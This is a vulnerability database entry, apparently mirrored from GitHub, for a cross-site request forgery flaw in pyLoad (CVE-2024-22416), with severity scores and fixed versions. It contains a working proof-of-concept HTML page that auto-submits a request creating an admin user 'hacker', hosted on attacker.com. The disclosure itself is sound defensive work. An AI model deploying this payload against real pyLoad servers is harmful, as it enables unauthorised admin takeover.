Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-pgpj-v85q-h5fm

Опубликовано: 19 янв. 2024
Источник: github
Github: Прошло ревью
CVSS4: 9.4
CVSS3: 9.6

Описание

Cross-Site Request Forgery on any API call in pyLoad may lead to admin privilege escalation

Summary

The pyload API allows any API call to be made using GET requests. Since the session cookie is not set to SameSite: strict, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user.

PoC

We host the following HTML file on an attacker-controlled server.

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

If we now trick an administrator into visiting our malicious page at https://attacker.com/CSRF.html, we see that their browser will make a request to /api/add_user/%22hacker%22,%22hacker%22, adding a new administrator to the pyload application. image

The attacker can now authenticate as this newly created administrator user with the username hacker and password hacker. image

Impact

Any API call can be made via a CSRF attack by an unauthenticated user.

Ссылки

Пакеты

Наименование

pyload-ng

pip
Затронутые версииВерсия исправления

< 0.5.0b3.dev78

0.5.0b3.dev78

EPSS

Процентиль: 90%
0.05898
Низкий

9.4 Critical

CVSS4

9.6 Critical

CVSS3

CVE ID

CVE-2024-22416

Дефекты

CWE-352

Связанные уязвимости

nvd логотип

CVE-2024-22416

CVSS3: 9.6
nvd
около 2 лет назад

pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.

debian логотип

CVE-2024-22416

CVSS3: 9.6
debian
около 2 лет назад

pyLoad is a free and open-source Download Manager written in pure Pyth ...

fstec логотип

BDU:2024-01075

CVSS3: 8.8
fstec
около 3 лет назад

Уязвимость программного обеспечения для загрузки файлов pyload, связанная с подделкой межсайтовых запросов, позволяющая нарушителю осуществить CSRF-атаку

EPSS

Процентиль: 90%
0.05898
Низкий

9.4 Critical

CVSS4

9.6 Critical

CVSS3

CVE ID

CVE-2024-22416

Дефекты

CWE-352